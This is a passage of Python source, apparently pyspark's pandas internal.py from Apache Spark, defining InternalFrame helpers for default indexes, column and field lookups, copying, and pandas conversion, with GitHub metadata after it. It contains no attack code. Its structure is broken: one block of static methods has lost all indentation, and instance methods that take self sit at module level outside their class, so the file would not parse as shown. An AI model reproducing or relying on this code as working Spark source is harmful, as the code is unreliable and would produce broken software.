            assert not any(SPARK_INDEX_NAME_PATTERN.match(name) for name in spark_frame.columns), (
                "Index columns should not appear in columns of the Spark DataFrame. Avoid "
                "index column names [%s]." % SPARK_INDEX_NAME_PATTERN
            )

            # Create default index.
            spark_frame = InternalFrame.attach_default_index(spark_frame)
            index_spark_columns = [scol_for(spark_frame, SPARK_DEFAULT_INDEX_NAME)]

            index_fields = [
                InternalField.from_struct_field(
                    StructField(SPARK_DEFAULT_INDEX_NAME, LongType(), nullable=False)
                )
            ]

            if data_spark_columns is not None:
                data_struct_fields = [
                    field
                    for field in spark_frame.schema.fields
                    if field.name != SPARK_DEFAULT_INDEX_NAME
                ]
                data_spark_columns = [
                    scol_for(spark_frame, field.name) for field in data_struct_fields
                ]
                if data_fields is not None:
                    # Rename the given fields to match the aliased column names.
                    data_fields = [
                        field.copy(
                            name=name_like_string(struct_field.name),
                        )
                        for field, struct_field in zip(data_fields, data_struct_fields)
                    ]

        # Attach a hidden monotonically-increasing column used to preserve the
        # natural row order across operations.
        if NATURAL_ORDER_COLUMN_NAME not in spark_frame.columns:
            spark_frame = spark_frame.withColumn(
                NATURAL_ORDER_COLUMN_NAME, F.monotonically_increasing_id()
            )

        self._sdf = spark_frame  # type: SparkDataFrame

        # index_spark_columns
        assert all(
            isinstance(index_scol, Column) for index_scol in index_spark_columns
        ), index_spark_columns
        self._index_spark_columns = index_spark_columns  # type: List[Column]

        # data_spark_columns
        # If not given, the data columns are all columns that are neither index
        # columns nor hidden internal columns.
        if data_spark_columns is None:
            data_spark_columns = [
                scol_for(spark_frame, col)
                for col in spark_frame.columns
                if all(
                    not spark_column_equals(scol_for(spark_frame, col), index_scol)
                    for index_scol in index_spark_columns
                )
                and col not in HIDDEN_COLUMNS
            ]
            self._data_spark_columns = data_spark_columns  # type: List[Column]
        else:
            assert all(isinstance(scol, Column) for scol in data_spark_columns)
            self._data_spark_columns = data_spark_columns

        # fields
        # Fill in missing InternalFields (or missing StructFields inside them)
        # from the Spark schema. The three branches only differ in which subset
        # needs resolution, to avoid an unnecessary schema computation.
        if index_fields is None:
            index_fields = [None] * len(index_spark_columns)

        if data_fields is None:
            data_fields = [None] * len(data_spark_columns)

        assert len(index_spark_columns) == len(index_fields), (
            len(index_spark_columns),
            len(index_fields),
        )
        assert len(data_spark_columns) == len(data_fields), (
            len(data_spark_columns),
            len(data_fields),
        )

        if any(field is None or field.struct_field is None for field in index_fields) and any(
            field is None or field.struct_field is None for field in data_fields
        ):
            schema = spark_frame.select(index_spark_columns + data_spark_columns).schema
            fields = [
                InternalField.from_struct_field(struct_field)
                if field is None
                else InternalField(field.dtype, struct_field)
                if field.struct_field is None
                else field
                for field, struct_field in zip(index_fields + data_fields, schema.fields)
            ]
            index_fields = fields[: len(index_spark_columns)]
            data_fields = fields[len(index_spark_columns) :]
        elif any(field is None or field.struct_field is None for field in index_fields):
            schema = spark_frame.select(index_spark_columns).schema
            index_fields = [
                InternalField.from_struct_field(struct_field)
                if field is None
                else InternalField(field.dtype, struct_field)
                if field.struct_field is None
                else field
                for field, struct_field in zip(index_fields, schema.fields)
            ]
        elif any(field is None or field.struct_field is None for field in data_fields):
            schema = spark_frame.select(data_spark_columns).schema
            data_fields = [
                InternalField.from_struct_field(struct_field)
                if field is None
                else InternalField(field.dtype, struct_field)
                if field.struct_field is None
                else field
                for field, struct_field in zip(data_fields, schema.fields)
            ]

        # Every resolved index dtype must be representable in Spark (or object).
        assert all(
            isinstance(ops.dtype, Dtype.__args__)  # type: ignore
            and (
                ops.dtype == np.dtype("object")
                or as_spark_type(ops.dtype, raise_error=False) is not None
            )
            for ops in index_fields
        ), index_fields

        if is_testing():
            struct_fields = spark_frame.select(index_spark_columns).schema.fields
            assert all(
                index_field.struct_field == struct_field
                for index_field, struct_field in zip(index_fields, struct_fields)
            ), (index_fields, struct_fields)

        self._index_fields = index_fields  # type: List[InternalField]

        # Every resolved data dtype must be representable in Spark (or object).
        assert all(
            isinstance(ops.dtype, Dtype.__args__)  # type: ignore
            and (
                ops.dtype == np.dtype("object")
                or as_spark_type(ops.dtype, raise_error=False) is not None
            )
            for ops in data_fields
        ), data_fields

        if is_testing():
            struct_fields = spark_frame.select(data_spark_columns).schema.fields
            assert all(
                data_field.struct_field == struct_field
                for data_field, struct_field in zip(data_fields, struct_fields)
            ), (data_fields, struct_fields)

        self._data_fields = data_fields  # type: List[InternalField]

        # index_names
        if not index_names:
            index_names = [None] * len(index_spark_columns)

        assert len(index_spark_columns) == len(index_names), (
            len(index_spark_columns),
            len(index_names),
        )
        assert all(
            is_name_like_tuple(index_name, check_type=True) for index_name in index_names
        ), index_names
        self._index_names = index_names  # type: List[Optional[Label]]

        # column_labels
        # Default labels are one-level tuples built from the column names.
        if column_labels is None:
            self._column_labels = [
                (col,) for col in spark_frame.select(self._data_spark_columns).columns
            ]  # type: List[Label]
        else:
            assert len(column_labels) == len(self._data_spark_columns), (
                len(column_labels),
                len(self._data_spark_columns),
            )
            if len(column_labels) == 1:
                column_label = column_labels[0]
                assert is_name_like_tuple(column_label, check_type=True), column_label
            else:
                assert all(
                    is_name_like_tuple(column_label, check_type=True)
                    for column_label in column_labels
                ), column_labels
                # All labels must have the same number of levels.
                assert len(set(len(label) for label in column_labels)) <= 1, column_labels
            self._column_labels = column_labels

        # column_label_names
        if column_label_names is None:
            self._column_label_names = [None] * column_labels_level(
                self._column_labels
            )  # type: List[Optional[Label]]
        else:
            if len(self._column_labels) > 0:
                assert len(column_label_names) == column_labels_level(self._column_labels), (
                    len(column_label_names),
                    column_labels_level(self._column_labels),
                )
            else:
                assert len(column_label_names) > 0, len(column_label_names)
            assert all(
                is_name_like_tuple(column_label_name, check_type=True)
                for column_label_name in column_label_names
            ), column_label_names
            self._column_label_names = column_label_names
@staticmethod
def attach_default_index(
sdf: SparkDataFrame, default_index_type: Optional[str] = None
) -> SparkDataFrame:
"""
This method attaches a default index to Spark DataFrame. Spark does not have the index
notion so corresponding column should be generated.
There are several types of default index can be configured by `compute.default_index_type`.
>>> spark_frame = ps.range(10).to_spark()
>>> spark_frame
DataFrame[id: bigint]
It adds the default index column '__index_level_0__'.
>>> spark_frame = InternalFrame.attach_default_index(spark_frame)
>>> spark_frame
DataFrame[__index_level_0__: bigint, id: bigint]
It throws an exception if the given column name already exists.
>>> InternalFrame.attach_default_index(spark_frame)
... # doctest: +ELLIPSIS
Traceback (most recent call last):
...
AssertionError: '__index_level_0__' already exists...
"""
index_column = SPARK_DEFAULT_INDEX_NAME
assert (
index_column not in sdf.columns
), "'%s' already exists in the Spark column names '%s'" % (index_column, sdf.columns)
if default_index_type is None:
default_index_type = ps.get_option("compute.default_index_type")
if default_index_type == "sequence":
return InternalFrame.attach_sequence_column(sdf, column_name=index_column)
elif default_index_type == "distributed-sequence":
return InternalFrame.attach_distributed_sequence_column(sdf, column_name=index_column)
elif default_index_type == "distributed":
return InternalFrame.attach_distributed_column(sdf, column_name=index_column)
else:
raise ValueError(
"'compute.default_index_type' should be one of 'sequence',"
" 'distributed-sequence' and 'distributed'"
)
@staticmethod
def attach_sequence_column(sdf: SparkDataFrame, column_name: str) -> SparkDataFrame:
scols = [scol_for(sdf, column) for column in sdf.columns]
sequential_index = (
F.row_number().over(Window.orderBy(F.monotonically_increasing_id())).cast("long") - 1
)
return sdf.select(sequential_index.alias(column_name), *scols)
@staticmethod
def attach_distributed_column(sdf: SparkDataFrame, column_name: str) -> SparkDataFrame:
scols = [scol_for(sdf, column) for column in sdf.columns]
return sdf.select(F.monotonically_increasing_id().alias(column_name), *scols)
@staticmethod
def attach_distributed_sequence_column(sdf: SparkDataFrame, column_name: str) -> SparkDataFrame:
"""
This method attaches a Spark column that has a sequence in a distributed manner.
This is equivalent to the column assigned when default index type 'distributed-sequence'.
>>> sdf = ps.DataFrame(['a', 'b', 'c']).to_spark()
>>> sdf = InternalFrame.attach_distributed_sequence_column(sdf, column_name="sequence")
>>> sdf.show() # doctest: +NORMALIZE_WHITESPACE
+--------+---+
|sequence| 0|
+--------+---+
| 0| a|
| 1| b|
| 2| c|
+--------+---+
"""
if len(sdf.columns) > 0:
return SparkDataFrame(
sdf._jdf.toDF().withSequenceColumn(column_name), # type: ignore
sdf.sql_ctx,
)
else:
cnt = sdf.count()
if cnt > 0:
return default_session().range(cnt).toDF(column_name)
else:
return default_session().createDataFrame(
[], schema=StructType().add(column_name, data_type=LongType(), nullable=False)
)
def spark_column_for(self, label: Label) -> Column:
    """Return the Spark Column for the given column label.

    Raises ``KeyError`` (with a human-readable label string) when the label
    is not managed by this frame.
    """
    label_to_column = dict(zip(self.column_labels, self.data_spark_columns))
    try:
        return label_to_column[label]
    except KeyError:
        raise KeyError(name_like_string(label))
def spark_column_name_for(self, label_or_scol: Union[Label, Column]) -> str:
    """Return the actual Spark column name for the given column label or Column."""
    if not isinstance(label_or_scol, Column):
        # A label: the InternalField already stores the physical column name.
        return self.field_for(label_or_scol).name
    return self.spark_frame.select(label_or_scol).columns[0]
def spark_type_for(self, label_or_scol: Union[Label, Column]) -> DataType:
    """Return the Spark DataType for the given column label or Column."""
    if isinstance(label_or_scol, Column):
        projected_schema = self.spark_frame.select(label_or_scol).schema
        return projected_schema[0].dataType
    return self.field_for(label_or_scol).spark_type
def spark_column_nullable_for(self, label_or_scol: Union[Label, Column]) -> bool:
    """Return nullability for the given column label or Column."""
    if not isinstance(label_or_scol, Column):
        return self.field_for(label_or_scol).nullable
    return self.spark_frame.select(label_or_scol).schema[0].nullable
def field_for(self, label: Label) -> InternalField:
    """Return the InternalField for the given column label.

    Raises ``KeyError`` (with a human-readable label string) when the label
    is not managed by this frame.
    """
    label_to_field = dict(zip(self.column_labels, self.data_fields))
    try:
        return label_to_field[label]
    except KeyError:
        raise KeyError(name_like_string(label))
@property
def spark_frame(self) -> SparkDataFrame:
    """Return the managed Spark DataFrame backing this InternalFrame."""
    return self._sdf
@lazy_property
def data_spark_column_names(self) -> List[str]:
    """Return the physical Spark column names of the managed data columns."""
    return [data_field.name for data_field in self.data_fields]
@property
def data_spark_columns(self) -> List[Column]:
    """Return Spark Columns for the managed data columns."""
    return self._data_spark_columns
@property
def index_spark_column_names(self) -> List[str]:
    """Return the physical Spark column names of the managed index columns."""
    return [index_field.name for index_field in self.index_fields]
@property
def index_spark_columns(self) -> List[Column]:
    """Return Spark Columns for the managed index columns."""
    return self._index_spark_columns
@lazy_property
def spark_column_names(self) -> List[str]:
    """Return all the field names, index field names included."""
    projected = self.spark_frame.select(self.spark_columns)
    return projected.columns
@lazy_property
def spark_columns(self) -> List[Column]:
    """Return Spark Columns for the managed columns including index columns.

    Data columns that are the very same Column objects as an index column are
    emitted only once (as part of the index columns).
    """
    index_scols = self.index_spark_columns
    deduplicated_data_scols = [
        data_scol
        for data_scol in self.data_spark_columns
        if not any(spark_column_equals(data_scol, index_scol) for index_scol in index_scols)
    ]
    return index_scols + deduplicated_data_scols
@property
def index_names(self) -> List[Optional[Label]]:
    """Return the managed index names (as label tuples, or None)."""
    return self._index_names
@lazy_property
def index_level(self) -> int:
    """Return the number of levels of the index."""
    return len(self._index_names)
@property
def column_labels(self) -> List[Label]:
    """Return the managed column index (as label tuples)."""
    return self._column_labels
@lazy_property
def column_labels_level(self) -> int:
    """Return the number of levels of the column index."""
    return len(self._column_label_names)
@property
def column_label_names(self) -> List[Optional[Label]]:
    """Return names of the column index levels."""
    return self._column_label_names
@property
def index_fields(self) -> List[InternalField]:
    """Return InternalFields for the managed index columns."""
    return self._index_fields
@property
def data_fields(self) -> List[InternalField]:
    """Return InternalFields for the managed data columns."""
    return self._data_fields
@lazy_property
def to_internal_spark_frame(self) -> SparkDataFrame:
    """
    Return as Spark DataFrame. This contains index columns as well
    and should be only used for internal purposes.
    """
    index_scols = self.index_spark_columns
    # Data columns that are the same Column object as an index column are
    # already covered by the index selection; keep only the rest.
    data_scols = [
        data_scol
        for data_scol in self.data_spark_columns
        if not any(spark_column_equals(data_scol, index_scol) for index_scol in index_scols)
    ]
    return self.spark_frame.select(index_scols + data_scols)
@lazy_property
def to_pandas_frame(self) -> pd.DataFrame:
    """Return as pandas DataFrame, with indices/labels restored from metadata."""
    sdf = self.to_internal_spark_frame
    pdf = sdf.toPandas()
    if len(pdf) == 0 and len(sdf.schema) > 0:
        # Empty result: re-apply dtypes derived from the Spark schema —
        # presumably toPandas() cannot infer them with zero rows (TODO confirm).
        pdf = pdf.astype(
            {field.name: spark_type_to_pandas_dtype(field.dataType) for field in sdf.schema}
        )
    return InternalFrame.restore_index(pdf, **self.arguments_for_restore_index)
@lazy_property
def arguments_for_restore_index(self) -> Dict:
    """Create the keyword arguments expected by `restore_index`."""
    column_names = []
    fields = self.index_fields.copy()

    for spark_column, column_name, field in zip(
        self.data_spark_columns, self.data_spark_column_names, self.data_fields
    ):
        # If a data column is the same Column as one of the index columns,
        # refer to it by the index column's name and don't duplicate its field.
        for index_spark_column_name, index_spark_column in zip(
            self.index_spark_column_names, self.index_spark_columns
        ):
            if spark_column_equals(spark_column, index_spark_column):
                column_names.append(index_spark_column_name)
                break
        else:
            # for-else: no matching index column found — a regular data column.
            column_names.append(column_name)
            fields.append(field)

    return dict(
        index_columns=self.index_spark_column_names,
        index_names=self.index_names,
        data_columns=column_names,
        column_labels=self.column_labels,
        column_label_names=self.column_label_names,
        fields=fields,
    )
@staticmethod
def restore_index(
    pdf: pd.DataFrame,
    *,
    index_columns: List[str],
    index_names: List[Label],
    data_columns: List[str],
    column_labels: List[Label],
    column_label_names: List[Label],
    fields: List[InternalField] = None,
) -> pd.DataFrame:
    """
    Restore pandas DataFrame indices using the metadata.

    :param pdf: the pandas DataFrame to be processed.
    :param index_columns: the original column names for index columns.
    :param index_names: the index names after restored.
    :param data_columns: the original column names for data columns.
    :param column_labels: the column labels after restored.
    :param column_label_names: the column label names after restored.
    :param fields: the fields after restored.
    :return: the restored pandas DataFrame

    >>> from numpy import dtype
    >>> pdf = pd.DataFrame({"index": [10, 20, 30], "a": ['a', 'b', 'c'], "b": [0, 2, 1]})
    >>> InternalFrame.restore_index(
    ...     pdf,
    ...     index_columns=["index"],
    ...     index_names=[("idx",)],
    ...     data_columns=["a", "b", "index"],
    ...     column_labels=[("x",), ("y",), ("z",)],
    ...     column_label_names=[("lv1",)],
    ...     fields=[
    ...         InternalField(
    ...             dtype=dtype('int64'),
    ...             struct_field=StructField(name='index', dataType=LongType(), nullable=False),
    ...         ),
    ...         InternalField(
    ...             dtype=dtype('object'),
    ...             struct_field=StructField(name='a', dataType=StringType(), nullable=False),
    ...         ),
    ...         InternalField(
    ...             dtype=CategoricalDtype(categories=["i", "j", "k"]),
    ...             struct_field=StructField(name='b', dataType=LongType(), nullable=False),
    ...         ),
    ...     ],
    ... )  # doctest: +NORMALIZE_WHITESPACE
    lv1  x  y   z
    idx
    10   a  i  10
    20   b  k  20
    30   c  j  30
    """
    # Restore pandas-side dtypes (e.g. categoricals) from the InternalFields.
    for col, field in zip(pdf.columns, fields):
        pdf[col] = DataTypeOps(field.dtype, field.spark_type).restore(pdf[col])

    # Move the index columns into the (multi-)index; keep a column copy when
    # the same column also appears among the data columns (drop=False).
    append = False
    for index_field in index_columns:
        drop = index_field not in data_columns
        pdf = pdf.set_index(index_field, drop=drop, append=append)
        append = True
    pdf = pdf[data_columns]

    # Labels are stored as tuples; unwrap single-level labels to scalars.
    pdf.index.names = [
        name if name is None or len(name) > 1 else name[0] for name in index_names
    ]

    names = [name if name is None or len(name) > 1 else name[0] for name in column_label_names]
    if len(column_label_names) > 1:
        pdf.columns = pd.MultiIndex.from_tuples(column_labels, names=names)
    else:
        pdf.columns = pd.Index(
            [None if label is None else label[0] for label in column_labels],
            name=names[0],
        )

    return pdf
@lazy_property
def resolved_copy(self) -> "InternalFrame":
    """Copy the immutable InternalFrame with the updates resolved, i.e. with
    all managed columns re-resolved against a freshly projected Spark DataFrame."""
    resolved_sdf = self.spark_frame.select(self.spark_columns + list(HIDDEN_COLUMNS))
    resolved_index = [scol_for(resolved_sdf, name) for name in self.index_spark_column_names]
    resolved_data = [scol_for(resolved_sdf, name) for name in self.data_spark_column_names]
    return self.copy(
        spark_frame=resolved_sdf,
        index_spark_columns=resolved_index,
        data_spark_columns=resolved_data,
    )
def with_new_sdf(
    self,
    spark_frame: SparkDataFrame,
    *,
    index_fields: Optional[List[InternalField]] = None,
    data_columns: Optional[List[str]] = None,
    data_fields: Optional[List[InternalField]] = None,
) -> "InternalFrame":
    """Copy the immutable InternalFrame with the updates by the specified Spark DataFrame.

    :param spark_frame: the new Spark DataFrame
    :param index_fields: the new InternalFields for the index columns.
        If None, the original dtypes are used.
    :param data_columns: the new column names. If None, the original one is used.
    :param data_fields: the new InternalFields for the data columns.
        If None, the original dtypes are used.
    :return: the copied InternalFrame.
    """
    # Each override must describe exactly the same number of columns as the
    # original; the asserts surface both lengths on failure.
    if index_fields is None:
        index_fields = self.index_fields
    else:
        assert len(index_fields) == len(self.index_fields), (
            len(index_fields),
            len(self.index_fields),
        )

    if data_columns is None:
        data_columns = self.data_spark_column_names
    else:
        assert len(data_columns) == len(self.column_labels), (
            len(data_columns),
            len(self.column_labels),
        )

    if data_fields is None:
        data_fields = self.data_fields
    else:
        assert len(data_fields) == len(self.column_labels), (
            len(data_fields),
            len(self.column_labels),
        )

    sdf = spark_frame.drop(NATURAL_ORDER_COLUMN_NAME)
    return self.copy(
        spark_frame=sdf,
        index_spark_columns=[scol_for(sdf, col) for col in self.index_spark_column_names],
        index_fields=index_fields,
        data_spark_columns=[scol_for(sdf, col) for col in data_columns],
        data_fields=data_fields,
    )
def with_new_columns(
    self,
    scols_or_pssers: Sequence[Union[Column, "Series"]],
    *,
    column_labels: Optional[List[Label]] = None,
    data_fields: Optional[List[InternalField]] = None,
    column_label_names: Union[Optional[List[Optional[Label]]], _NoValueType] = _NoValue,
    keep_order: bool = True,
) -> "InternalFrame":
    """
    Copy the immutable InternalFrame with the updates by the specified Spark Columns or Series.

    :param scols_or_pssers: the new Spark Columns or Series.
    :param column_labels: the new column index.
        If None, the column_labels of the corresponding `scols_or_pssers` is used if it is
        Series; otherwise the original one is used.
    :param data_fields: the new InternalFields for the data columns.
        If None, the dtypes of the corresponding `scols_or_pssers` is used if it is Series;
        otherwise the dtypes will be inferred from the corresponding `scols_or_pssers`.
    :param column_label_names: the new names of the column index levels.
    :param keep_order: if False, the new columns are projected eagerly and
        re-resolved against the projected frame.
    :return: the copied InternalFrame.
    """
    from pyspark.pandas.series import Series

    if column_labels is None:
        # Derive labels from Series where possible; otherwise keep the old ones.
        if all(isinstance(scol_or_psser, Series) for scol_or_psser in scols_or_pssers):
            column_labels = [cast(Series, psser)._column_label for psser in scols_or_pssers]
        else:
            assert len(scols_or_pssers) == len(self.column_labels), (
                len(scols_or_pssers),
                len(self.column_labels),
            )
            column_labels = []
            for scol_or_psser, label in zip(scols_or_pssers, self.column_labels):
                if isinstance(scol_or_psser, Series):
                    column_labels.append(scol_or_psser._column_label)
                else:
                    column_labels.append(label)
    else:
        assert len(scols_or_pssers) == len(column_labels), (
            len(scols_or_pssers),
            len(column_labels),
        )

    # Unwrap Series into their backing Spark Columns.
    data_spark_columns = []
    for scol_or_psser in scols_or_pssers:
        if isinstance(scol_or_psser, Series):
            scol = scol_or_psser.spark.column
        else:
            scol = scol_or_psser
        data_spark_columns.append(scol)

    if data_fields is None:
        # A None entry means no field information is available for that column.
        data_fields = []
        for scol_or_psser in scols_or_pssers:
            if isinstance(scol_or_psser, Series):
                data_fields.append(scol_or_psser._internal.data_fields[0])
            else:
                data_fields.append(None)
    else:
        assert len(scols_or_pssers) == len(data_fields), (
            len(scols_or_pssers),
            len(data_fields),
        )

    sdf = self.spark_frame
    if not keep_order:
        # Project eagerly and re-resolve the columns against the projection.
        sdf = self.spark_frame.select(self.index_spark_columns + data_spark_columns)
        index_spark_columns = [scol_for(sdf, col) for col in self.index_spark_column_names]
        data_spark_columns = [
            scol_for(sdf, col) for col in self.spark_frame.select(data_spark_columns).columns
        ]
    else:
        index_spark_columns = self.index_spark_columns

    if column_label_names is _NoValue:
        column_label_names = self._column_label_names

    return self.copy(
        spark_frame=sdf,
        index_spark_columns=index_spark_columns,
        column_labels=column_labels,
        data_spark_columns=data_spark_columns,
        data_fields=data_fields,
        column_label_names=column_label_names,
    )
def with_filter(self, pred: Union[Column, "Series"]) -> "InternalFrame":
    """
    Copy the immutable InternalFrame with the rows filtered by the predicate.

    :param pred: the boolean predicate to filter by, either a Spark Column
        or a pandas-on-Spark Series.
    :return: the copied InternalFrame.
    """
    from pyspark.pandas.series import Series

    if isinstance(pred, Series):
        assert isinstance(pred.spark.data_type, BooleanType), pred.spark.data_type
        condition = pred.spark.column
    else:
        # A raw Column: its resolved type must be boolean.
        spark_type = self.spark_frame.select(pred).schema[0].dataType
        assert isinstance(spark_type, BooleanType), spark_type
        condition = pred

    filtered_sdf = self.spark_frame.filter(condition).select(self.spark_columns)
    return self.with_new_sdf(filtered_sdf)
def with_new_spark_column(
    self,
    column_label: Label,
    scol: Column,
    *,
    field: Optional[InternalField] = None,
    keep_order: bool = True,
) -> "InternalFrame":
    """
    Copy the immutable InternalFrame, replacing one data column with the
    specified Spark Column.

    :param column_label: the column label to be updated.
    :param scol: the new Spark Column
    :param field: the new InternalField for the data column.
        If not specified, the InternalField will be inferred from the spark Column.
    :return: the copied InternalFrame.
    """
    assert column_label in self.column_labels, column_label
    position = self.column_labels.index(column_label)

    updated_scols = list(self.data_spark_columns)
    updated_fields = list(self.data_fields)
    updated_scols[position] = scol
    updated_fields[position] = field

    return self.with_new_columns(
        updated_scols, data_fields=updated_fields, keep_order=keep_order
    )
def select_column(self, column_label: Label) -> "InternalFrame":
    """
    Copy the immutable InternalFrame narrowed down to a single data column.

    :param column_label: the column label to use.
    :return: the copied InternalFrame.
    """
    assert column_label in self.column_labels, column_label
    selected_scol = self.spark_column_for(column_label)
    selected_field = self.field_for(column_label)
    return self.copy(
        column_labels=[column_label],
        data_spark_columns=[selected_scol],
        data_fields=[selected_field],
        column_label_names=None,
    )
def copy(
    self,
    *,
    spark_frame: Union[SparkDataFrame, _NoValueType] = _NoValue,
    index_spark_columns: Union[List[Column], _NoValueType] = _NoValue,
    index_names: Union[Optional[List[Optional[Label]]], _NoValueType] = _NoValue,
    index_fields: Union[Optional[List[InternalField]], _NoValueType] = _NoValue,
    column_labels: Union[Optional[List[Label]], _NoValueType] = _NoValue,
    data_spark_columns: Union[Optional[List[Column]], _NoValueType] = _NoValue,
    data_fields: Union[Optional[List[InternalField]], _NoValueType] = _NoValue,
    column_label_names: Union[Optional[List[Optional[Label]]], _NoValueType] = _NoValue,
) -> "InternalFrame":
    """
    Copy the immutable InternalFrame.

    :param spark_frame: the new Spark DataFrame. If not specified, the original one is used.
    :param index_spark_columns: the list of Spark Column.
        If not specified, the original ones are used.
    :param index_names: the index names. If not specified, the original ones are used.
    :param index_fields: the new InternalFields for the index columns.
        If not specified, the original metadata are used.
    :param column_labels: the new column labels. If not specified, the original ones are used.
    :param data_spark_columns: the new Spark Columns.
        If not specified, the original ones are used.
    :param data_fields: the new InternalFields for the data columns.
        If not specified, the original metadata are used.
    :param column_label_names: the new names of the column index levels.
        If not specified, the original ones are used.
    :return: the copied immutable InternalFrame.
    """
    # `_NoValue` distinguishes "argument not passed" from an explicit None,
    # since None is a meaningful value for several of these parameters.
    if spark_frame is _NoValue:
        spark_frame = self.spark_frame
    if index_spark_columns is _NoValue:
        index_spark_columns = self.index_spark_columns
    if index_names is _NoValue:
        index_names = self.index_names
    if index_fields is _NoValue:
        index_fields = self.index_fields
    if column_labels is _NoValue:
        column_labels = self.column_labels
    if data_spark_columns is _NoValue:
        data_spark_columns = self.data_spark_columns
    if data_fields is _NoValue:
        data_fields = self.data_fields
    if column_label_names is _NoValue:
        column_label_names = self.column_label_names
    return InternalFrame(
        spark_frame=cast(SparkDataFrame, spark_frame),
        index_spark_columns=cast(List[Column], index_spark_columns),
        index_names=cast(Optional[List[Optional[Label]]], index_names),
        index_fields=cast(Optional[List[InternalField]], index_fields),
        column_labels=cast(Optional[List[Label]], column_labels),
        data_spark_columns=cast(Optional[List[Column]], data_spark_columns),
        data_fields=cast(Optional[List[InternalField]], data_fields),
        column_label_names=cast(Optional[List[Optional[Label]]], column_label_names),
    )
@staticmethod
def from_pandas(pdf: pd.DataFrame) -> "InternalFrame":
    """Create an immutable DataFrame from pandas DataFrame.

    :param pdf: :class:`pd.DataFrame`
    :return: the created immutable DataFrame
    """
    # Normalize index/column names to label tuples (scalars become 1-tuples).
    index_names = [
        name if name is None or isinstance(name, tuple) else (name,) for name in pdf.index.names
    ]  # type: List[Optional[Label]]

    columns = pdf.columns
    if isinstance(columns, pd.MultiIndex):
        column_labels = columns.tolist()  # type: List[Label]
    else:
        column_labels = [(col,) for col in columns]
    column_label_names = [
        name if name is None or isinstance(name, tuple) else (name,) for name in columns.names
    ]  # type: List[Optional[Label]]

    (
        pdf,
        index_columns,
        index_fields,
        data_columns,
        data_fields,
    ) = InternalFrame.prepare_pandas_frame(pdf)

    # Build the Spark schema from the prepared fields and materialize the frame.
    schema = StructType([field.struct_field for field in index_fields + data_fields])
    sdf = default_session().createDataFrame(pdf, schema=schema)
    return InternalFrame(
        spark_frame=sdf,
        index_spark_columns=[scol_for(sdf, col) for col in index_columns],
        index_names=index_names,
        index_fields=index_fields,
        column_labels=column_labels,
        data_spark_columns=[scol_for(sdf, col) for col in data_columns],
        data_fields=data_fields,
        column_label_names=column_label_names,
    )
@staticmethod
def prepare_pandas_frame(
    pdf: pd.DataFrame, *, retain_index: bool = True
) -> Tuple[pd.DataFrame, List[str], List[InternalField], List[str], List[InternalField]]:
    """
    Prepare pandas DataFrame for creating Spark DataFrame.

    :param pdf: the pandas DataFrame to be prepared.
    :param retain_index: whether the indices should be retained.
    :return: the tuple of
        - the prepared pandas dataFrame
        - index column names for Spark DataFrame
        - the InternalFields for the index columns of the given pandas DataFrame
        - data column names for Spark DataFrame
        - the InternalFields for the data columns of the given pandas DataFrame

    >>> pdf = pd.DataFrame(
    ...    {("x", "a"): ['a', 'b', 'c'],
    ...     ("y", "b"): pd.Categorical(["i", "k", "j"], categories=["i", "j", "k"])},
    ...    index=[10, 20, 30])
    >>> prepared, index_columns, index_fields, data_columns, data_fields = (
    ...     InternalFrame.prepare_pandas_frame(pdf)
    ... )
    >>> prepared
       __index_level_0__ (x, a)  (y, b)
    0                 10      a       0
    1                 20      b       2
    2                 30      c       1
    >>> index_columns
    ['__index_level_0__']
    >>> index_fields
    [InternalField(dtype=int64,struct_field=StructField(__index_level_0__,LongType,false))]
    >>> data_columns
    ['(x, a)', '(y, b)']
    >>> data_fields  # doctest: +NORMALIZE_WHITESPACE
    [InternalField(dtype=object,struct_field=StructField((x, a),StringType,false)),
     InternalField(dtype=category,struct_field=StructField((y, b),ByteType,false))]
    """
    pdf = pdf.copy()

    # Flatten column labels to strings so Spark accepts them as column names.
    data_columns = [name_like_string(col) for col in pdf.columns]
    pdf.columns = data_columns

    if retain_index:
        # Turn each index level into an ordinary column with a reserved name.
        index_nlevels = pdf.index.nlevels
        index_columns = [SPARK_INDEX_NAME_FORMAT(i) for i in range(index_nlevels)]
        pdf.index.names = index_columns
        reset_index = pdf.reset_index()
    else:
        index_nlevels = 0
        index_columns = []
        reset_index = pdf

    index_dtypes = list(reset_index.dtypes)[:index_nlevels]
    data_dtypes = list(reset_index.dtypes)[index_nlevels:]

    # Convert each column into a Spark-compatible representation
    # (e.g. categoricals become their integer codes).
    for col, dtype in zip(reset_index.columns, reset_index.dtypes):
        spark_type = infer_pd_series_spark_type(reset_index[col], dtype)
        reset_index[col] = DataTypeOps(dtype, spark_type).prepare(reset_index[col])

    # NOTE(review): the Spark type is re-inferred here on the *prepared*
    # column, paired with the original pandas dtype — confirm intended.
    fields = [
        InternalField(
            dtype=dtype,
            struct_field=StructField(
                name=name,
                dataType=infer_pd_series_spark_type(col, dtype),
                nullable=bool(col.isnull().any()),
            ),
        )
        for (name, col), dtype in zip(reset_index.iteritems(), index_dtypes + data_dtypes)
    ]

    return (
        reset_index,
        index_columns,
        fields[:index_nlevels],
        data_columns,
        fields[index_nlevels:],
    )
def _test() -> None:
    """Run this module's doctests against a local Spark session."""
    import os
    import doctest
    import sys
    from pyspark.sql import SparkSession
    import pyspark.pandas.internal

    # Doctests assume the working directory is the Spark home.
    os.chdir(os.environ["SPARK_HOME"])

    globs = pyspark.pandas.internal.__dict__.copy()
    globs["ps"] = pyspark.pandas
    spark = (
        SparkSession.builder.master("local[4]")
        .appName("pyspark.pandas.internal tests")
        .getOrCreate()
    )
    (failure_count, test_count) = doctest.testmod(
        pyspark.pandas.internal,
        globs=globs,
        optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,
    )
    spark.stop()
    if failure_count:
        # Non-zero exit status signals doctest failure to the caller.
        sys.exit(-1)
if __name__ == "__main__":
    # Run the doctests when this module is executed directly.
    _test()
| {
"content_hash": "61da0cf903398e6616a81a36c4e719dd",
"timestamp": "",
"source": "github",
"line_count": 1567,
"max_line_length": 100,
"avg_line_length": 40.029993618379066,
"alnum_prop": 0.5485197761729399,
"repo_name": "jiangxb1987/spark",
"id": "53bb9644fd89266ebae4bd5e101a72c08c71c943",
"size": "63512",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/pyspark/pandas/internal.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "50024"
},
{
"name": "Batchfile",
"bytes": "31352"
},
{
"name": "C",
"bytes": "1493"
},
{
"name": "CSS",
"bytes": "26836"
},
{
"name": "Dockerfile",
"bytes": "9014"
},
{
